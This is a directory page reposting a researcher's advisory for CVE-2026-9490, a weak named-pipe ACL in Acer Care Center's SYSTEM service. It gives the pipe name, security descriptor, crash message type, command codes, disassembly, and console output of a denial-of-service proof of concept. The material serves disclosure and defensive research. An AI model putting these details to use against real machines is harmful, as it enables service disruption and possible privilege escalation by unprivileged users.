Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-9490 — The ACCSvc service creates a Named Pipe with a weak Security Descriptor that allows any authenticated user to connect and send messages. When a specially crafted message (message type 0x03) is sent to the pipe, the service crashes with exit code 1067 (ERROR_PROCESS_ABORTED). | Kitploit
Tools/GitHubGitHub/ugvxb/cve-2026-9490
Privilege EscalationVulnerability AnalysisExploitationReverse EngineeringPenetration TestingBinary Analysis
GitHubugvxb/cve-2026-9490

CVE-2026-9490

The ACCSvc service creates a Named Pipe with a weak Security Descriptor that allows any authenticated user to connect and send messages. When a specially crafted message (message type 0x03) is sent to the pipe, the service crashes with exit code 1067 (ERROR_PROCESS_ABORTED).

View Repository
43 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE ID: CVE-2026-9490
Researcher: Vo Duc Thang (ugvxb)
Acknowledgement: https://community.acer.com/en/kb/articles/19668

1. Executive Summary

A critical security vulnerability has been identified in the Acer Care Center service (ACCSvc.exe). The vulnerability allows any authenticated local user to crash the system service (Denial of Service) and potentially escalate privileges through a weakly secured Named Pipe interface.

The service, which runs with SYSTEM privileges (LocalSystem), exposes a Named Pipe with overly permissive access controls that grant read, write, and execute permissions to all Authenticated Users.


2. Vulnerability Details

2.1 Affected Component

AttributeValue
ProductAcer Care Center
ComponentACCSvc.exe (ACC Service)
Service NameACCSvc
Installation PathC:\Program Files (x86)\Acer\Care Center\
Service AccountLocalSystem (NT AUTHORITY\SYSTEM)
Start TypeAUTO_START
Named Pipe\.\pipe\treadstone_service_LightMode

2.2 Vulnerability #1: Denial of Service

Description

The ACCSvc service creates a Named Pipe with a weak Security Descriptor that allows any authenticated user to connect and send messages. When a specially crafted message (message type 0x03) is sent to the pipe, the service crashes with exit code 1067 (ERROR_PROCESS_ABORTED).

Security Descriptor (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

SDDL Analysis

Impact

A standard user without any special privileges can terminate the ACCSvc system service, causing Acer Care Center functionality to become unavailable.

2.3 Vulnerability #2: Potential Local Privilege Escalation

Description

The same weak Named Pipe ACL allows authenticated users to send command messages that trigger the service to execute launcher applications via CreateProcessAsUserW.

Command Codes

CommandHex ValueTarget Executable
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. Technical Analysis

3.1 Binary Analysis

AttributeValue
FileACCSvc.exe
TypePE32+ executable (console) x86-64
Analysis ToolRadare2

3.2 Key Functions Identified

3.3 Named Pipe Creation Parameters

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 Command Dispatch Logic

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. Exploitation Results

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Result: Standard user successfully crashed SYSTEM service!


5. Risk Assessment

5.1 CVSS v4.0 Score

MetricValue
CVSS 4.0 VectorAV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
CVSS Base Score6.8 (Medium)

5.2 CWE Classifications

CWE IDName
CWE-269Improper Privilege Management

6. Disclaimer

This poc is for educational and authorized security research purposes only. The author is not responsible for any misuse. Exploitation without authorization is illegal.

Download Tool
ACEPrincipalPermissionAssessment
(D;OICI;GA;;;BG)Builtin GuestsDENY ALLSecure
(D;OICI;GA;;;AN)AnonymousDENY ALLSecure
(A;OICI;GRGWGX;;;AU)Authenticated UsersRead/Write/ExecuteVULNERABLE
(A;OICI;GA;;;BA)Builtin AdminsALLOW ALLExpected
Entry Point
0x14000fd4c
FunctionAddressPurpose
fcn.140009a700x140009a70CreateNamedPipeW - Creates vulnerable pipe
fcn.1400075700x140007570CreateProcessAsUserW - Spawns processes
fcn.14000a8a00x14000a8a0ReadFile handler
fcn.1400099500x140009950WriteFile handler
fcn.1400080500x140008050Message dispatcher